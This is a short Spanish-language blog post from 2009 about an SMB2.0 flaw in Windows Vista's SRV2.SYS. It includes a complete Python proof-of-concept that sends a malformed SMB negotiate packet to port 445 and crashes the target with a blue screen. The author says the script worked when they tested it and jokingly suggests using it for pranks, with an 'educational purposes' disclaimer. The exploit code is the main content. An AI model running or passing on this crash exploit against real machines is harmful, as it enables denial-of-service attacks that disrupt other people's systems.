A reiniciar Window$ Vi$tas….

por | 09/09/2009

Me acabo de encontrar con una vulnerabilidad muy, pero muy, linda…

El problema se encuentra en la implementación de SMB2.0, permitiendo reiniciar un equipo por medio de un script[1] o ejecutando algún que otro código malicioso.

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE 
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client 
send to a SMB server, and it's used to identify the SMB dialect 
that will be used for futher communication.

Por el momento, la empresa responsable del sistema operativo no ofreció solución/parche/fixup.

La misma se aplica a todas las versiones de Window$ Vi$ta y, posiblemente, a Window$ 2008 Server.

[1]Script:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = «IP_ADDR», 445
buff = (
«\x00\x00\x00\x90» # Begin SMB header: Session message
«\xff\x53\x4d\x42» # Server Component: SMB
«\x72\x00\x00\x00» # Negociate Protocol
«\x00\x18\x53\xc8» # Operation 0x18 & sub 0xc853
«\x00\x26″# Process ID High: –> :) normal value should be «\x00\x00»
«\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe»
«\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54»
«\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31»
«\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00»
«\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57»
«\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61»
«\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c»
«\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c»
«\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e»
«\x30\x30\x32\x00»
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Lo probé, yo personalmente, y funciono de maravillas… mostrando un hermoso BSOD :)

OJO ! usenlo con responsabilidad o para jugar una broma :P

Es solo con fines educativos ;)

LA FUENTE

** UPDATE ** 10/09/2009

En SecurityFocus ( http://www.securityfocus.com/bid/36299 ) publicaron un poco mas de informacio y una amplia variedad de exploits.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.